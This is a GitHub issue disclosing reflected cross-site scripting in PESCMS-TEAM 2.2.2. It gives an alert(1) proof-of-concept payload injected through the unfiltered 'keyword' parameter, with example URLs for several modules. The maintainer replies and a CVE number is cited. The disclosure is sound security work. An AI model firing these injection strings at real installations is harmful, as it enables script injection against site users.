New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

PECSM-TEAM 2.2.2 has multiple reflected Cross Site Scripting Vulnerability #3

Closed

snappyJack opened this issue Aug 30, 2018 · 3 comments

snappyJack commented Aug 30, 2018

I found multiple reflected cross site scripting vulnerability where the page use Model_index.php ,we can see where is no XSS filter in "keyword" parameter.

now I input payload :aa">< img src=x onerror=alert(1)>
the full url is :http://127.0.0.1/Public/?g=Team&m=User&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

and the code is running

and there are lots of pages use Model_index.php,and they all have reflected cross site scripting vulnerability.Like:

http://127.0.0.1/Public/?g=Team&m=User&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

http://127.0.0.1/Public/?g=Team&m=User_group&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

http://127.0.0.1/Public/?g=Team&m=Department&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

http://127.0.0.1/Public/?g=Team&m=Bulletin&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

..
..
..

Owner

lazyphp commented Aug 31, 2018

Thank you, I will fix this problem.

Owner

lazyphp commented Apr 10, 2019

即将发布的新版已经接近此问题。https://github.com/lazyphp/PESCMS-TEAM/tree/dev-2.3.0

lazyphp closed this as completed

NicoleG25 commented Jan 2, 2020

@lazyphp 问题已经解决了吗 ?
请注意，已分配 CVE-2018-16371

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment